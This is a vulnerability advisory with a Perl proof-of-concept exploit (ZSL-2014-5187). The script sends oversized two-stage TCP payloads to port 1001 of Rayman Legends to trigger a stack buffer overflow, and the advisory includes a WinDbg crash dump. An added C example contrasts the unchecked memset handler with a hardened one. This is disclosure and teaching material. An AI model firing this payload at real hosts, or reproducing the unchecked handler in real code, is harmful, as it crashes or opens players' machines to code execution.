#!/usr/bin/perl
#
#
# Ubisoft Rayman Legends v1.2.103716 Remote Stack Buffer Overflow Vulnerability
#
#
# Vendor: Ubisoft Entertainment S.A.
# Product web page: http://www.ubi.com
# Affected version: 1.2.103716, 1.1.100477 and 1.0.95278
#
# Summary: Rayman Legends is a 2013 platform game developed by Ubisoft
# Montpellier and published by Ubisoft. It is the fifth main title in
# the Rayman series and the direct sequel to the 2011 game Rayman Origins.
# The game was released for Microsoft Windows, Xbox 360, PlayStation 3,
# Wii U, and PlayStation Vita platforms in August and September 2013.
# PlayStation 4 and Xbox One versions were released in February 2014.
#
# Desc: The vulnerability is caused by a memset() boundary error in the
# processing of incoming data received through raw socket connections on
# TCP port 1001. It can be exploited to cause a stack-based buffer overflow
# by sending a long string of bytes on the second connection. Successful
# exploitation could allow execution of arbitrary code on the affected node.
#
# ===========================================================================
#
# (15a8.f0c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=aaaaaaaa ebx=096494a0 ecx=10909090 edx=00000002 esi=1c1bde90 edi=00000000
# eip=715e26df esp=0f16dcec ebp=0f16dd14 iopl=0         nv up ei pl nz na pe cy
# cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010207
# MSVCR100!memset+0x5f:
# 715e26df f3ab            rep stos dword ptr es:[edi]
# 0:028> d esp
# 0f16dcec  42 42 42 42 64 00 a6 00-00 00 00 00 aa 00 00 00  BBBBd...........
# 0f16dcfc  42 42 42 42 42 42 42 42-22 00 00 00 50 42 4b 1c  BBBBBBBB"...PBK.
# 0f16dd0c  90 43 0f 08 01 00 00 00-28 dd 16 0f 04 02 a6 00  .C......(.......
# 0f16dd1c  50 42 4b 1c 6c dd 16 0f-d8 03 00 00 4c fd 16 0f  PBK.l.......L...
# 0f16dd2c  e3 f9 a5 00 48 dd 16 0f-fc 03 00 00 3c 1d f7 07  ....H.......<...
# 0f16dd3c  3c 1d f7 07 fb 14 db 75-fc 03 00 00 41 41 41 41  <......u....AAAA
# 0f16dd4c  41 41 41 41 41 41 41 41-41 41 41 41 42 42 42 42  AAAAAAAAAAAABBBB
# 0f16dd5c  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
#
# ===========================================================================
#
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#            Microsoft Windows 7 Ultimate SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2014-5187
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5187.php
#
#
# 22.05.2014
#
#

use strict;
use warnings;
use IO::Socket;

print "
    @****************************************@
    |                                        |
    |  Ubisoft Rayman Legends BoF PoC Script |
    |                                        |
    |              ZSL-2014-5187             |
    |                                        |
    @****************************************@
";

# Exactly one argument is expected: the target IP address.
if ($#ARGV != 0) {
    print "\n\n\x20\x20\x1c\x20Usage: $0 <ipaddr>\n\n";
    exit();
}

my $ip = $ARGV[0];

print "\n\x20\x1c\x20Target: $ip\n";
print "\x20\x1c\x20Initiating first connection\n";
sleep 2;

# First stage: open a raw TCP connection to the game's listener on port 1001.
my $conn1 = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => 1001, Proto => 'tcp');

if (!$conn1) {
    print "\n\x20*** Connection error!\n";
    exit();
}
else {
    print "\x20\x1c\x20Connection established\n";
}

print $conn1 "\x44" x 36;
print $conn1 "\x45\x45\x45\x45";
print $conn1 "\x46" x 2000;        # shellcode container
print "\x20\x1c\x20Payload sent\n";
close $conn1;
print "\x20\x1c\x20First stage completed\n\x20\x1c\n";

print "\x20\x1c\x20Initiating second connection\n";
sleep 2;

# Second stage: a fresh connection carrying the data that triggers the overflow.
my $conn2 = IO::Socket::INET->new(PeerAddr => $ip, PeerPort => 1001, Proto => 'tcp');

if (!$conn2) {
    print "\n\x20*** Connection error!\n";
    exit();
}
else {
    print "\x20\x1c\x20Connection established\n";
}

print $conn2 "\x41" x 16;
print $conn2 "\x42\x42\x42\x42";   # ESP -> (these bytes land at esp in the crash dump)
print $conn2 "\x43" x 1000;        # shellcode container
print "\x20\x1c\x20Payload sent\n";
print "\x20\x1c\x20Second stage completed\n";
close $conn2;
print "\x20\x1c\x20t00t!\n";
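The advisory attributes the crash to a memset() whose length is derived from attacker-supplied socket data; the WinDbg state above (rep stos with ecx=0x10909090 and eax=0xaaaaaaaa) is what that looks like when the count register has been taken from the wire. The C program below is an added example written for this page, not code from the game or from the advisory author: it models the bug class with a hypothetical wire format (a 4-byte little-endian fill length followed by body bytes, an assumption made only for the example; Rayman's real protocol is not on the page) and puts the unchecked handler next to a hardened one that bounds the count by both the stack buffer and the bytes actually received. The fill byte 0xaa is chosen to echo eax in the crash dump; the 0x10909090 count mirrors ecx.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example modelling the memset() boundary error class described in
 * ZSL-2014-5187. The wire format (4-byte LE fill length + body) and the
 * 64-byte frame are assumptions for the example, not the game's real code.
 */
#define STACK_BUF_SIZE 64u

static uint32_t read_le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build a packet: header = fill length, body = body_len filler bytes. Returns total size, 0 on overflow of out. */
size_t build_packet(uint8_t *out, size_t out_cap, uint32_t fill_len, uint8_t filler, size_t body_len)
{
    if (out_cap < 4 + body_len) return 0;
    out[0] = (uint8_t)(fill_len & 0xff);
    out[1] = (uint8_t)((fill_len >> 8) & 0xff);
    out[2] = (uint8_t)((fill_len >> 16) & 0xff);
    out[3] = (uint8_t)((fill_len >> 24) & 0xff);
    memset(out + 4, filler, body_len);
    return 4 + body_len;
}

/* The count the vulnerable handler would hand to memset(); 0 if the header is short. */
uint32_t vulnerable_fill_count(const uint8_t *pkt, size_t pkt_len)
{
    if (pkt_len < 4) return 0;
    return read_le32(pkt);
}

/*
 * Vulnerable pattern: the memset() length comes straight from the packet and
 * is never compared with sizeof(buf). A large header value writes past the
 * frame, the "memset() boundary error" the advisory describes. Calling this
 * with a hostile packet corrupts the stack, so main() only feeds it benign data.
 */
int handle_vulnerable(const uint8_t *pkt, size_t pkt_len)
{
    uint8_t buf[STACK_BUF_SIZE];
    if (pkt_len < 4) return -1;
    uint32_t n = read_le32(pkt);
    memset(buf, 0xaa, n);                        /* BUG: n is unchecked */
    return (int)buf[0];                          /* 0xaa when n >= 1 */
}

/* Hardened: reject (do not silently clamp) a count larger than the buffer or than the bytes received. */
int handle_hardened(const uint8_t *pkt, size_t pkt_len)
{
    uint8_t buf[STACK_BUF_SIZE];
    if (pkt_len < 4) return -1;
    uint32_t n = read_le32(pkt);
    if (n > sizeof buf || n > pkt_len - 4) return -1;
    memset(buf, 0xaa, n);
    return (int)n;
}

/* Convenience: build a packet with the given header/body and run the hardened handler on it. */
int hardened_result(uint32_t fill_len, size_t body_len)
{
    uint8_t pkt[2048];
    size_t len = build_packet(pkt, sizeof pkt, fill_len, 'C', body_len);
    if (len == 0) return -2;
    return handle_hardened(pkt, len);
}

/* Same for the count the vulnerable path would use. */
uint32_t vulnerable_count_for(uint32_t fill_len, size_t body_len)
{
    uint8_t pkt[2048];
    size_t len = build_packet(pkt, sizeof pkt, fill_len, 'C', body_len);
    return vulnerable_fill_count(pkt, len);
}

int main(void)
{
    uint8_t pkt[2048];

    /* Benign packet: fill 16 bytes, 16-byte body. Both handlers accept it. */
    size_t len = build_packet(pkt, sizeof pkt, 16, 'C', 16);
    printf("benign : vulnerable=%d hardened=%d\n",
           handle_vulnerable(pkt, len), handle_hardened(pkt, len));

    /* Hostile packet modelled on the PoC's second stage: a 1000-byte 'C' body
       with a count far beyond the 64-byte frame. Only the hardened handler runs. */
    len = build_packet(pkt, sizeof pkt, 0x10909090u, 'C', 1000);
    printf("hostile: vulnerable path would memset %u bytes into a %u-byte buffer; hardened=%d\n",
           vulnerable_fill_count(pkt, len), STACK_BUF_SIZE, handle_hardened(pkt, len));
    return 0;
}
```

The check in handle_hardened is two-sided on purpose: bounding against sizeof(buf) stops the stack write, and bounding against pkt_len - 4 stops a header that promises more data than arrived from driving a later copy off the end of the receive buffer. Returning an error rather than clamping keeps a malformed client from silently degrading into a "works by accident" path that a fuzzer would otherwise never see.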